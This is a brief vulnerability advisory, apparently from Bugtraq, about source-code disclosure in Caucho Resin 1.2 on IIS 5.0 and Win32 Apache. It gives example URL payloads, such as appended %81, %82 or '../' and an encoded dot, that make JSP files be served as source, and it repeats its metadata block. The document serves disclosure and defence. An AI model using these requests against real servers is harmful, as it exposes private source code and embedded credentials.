Resin1.2重要源代碼暴露漏洞
bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32
Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81
Resin Web Server:
../
Example: http://target/filename.jsp../
IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp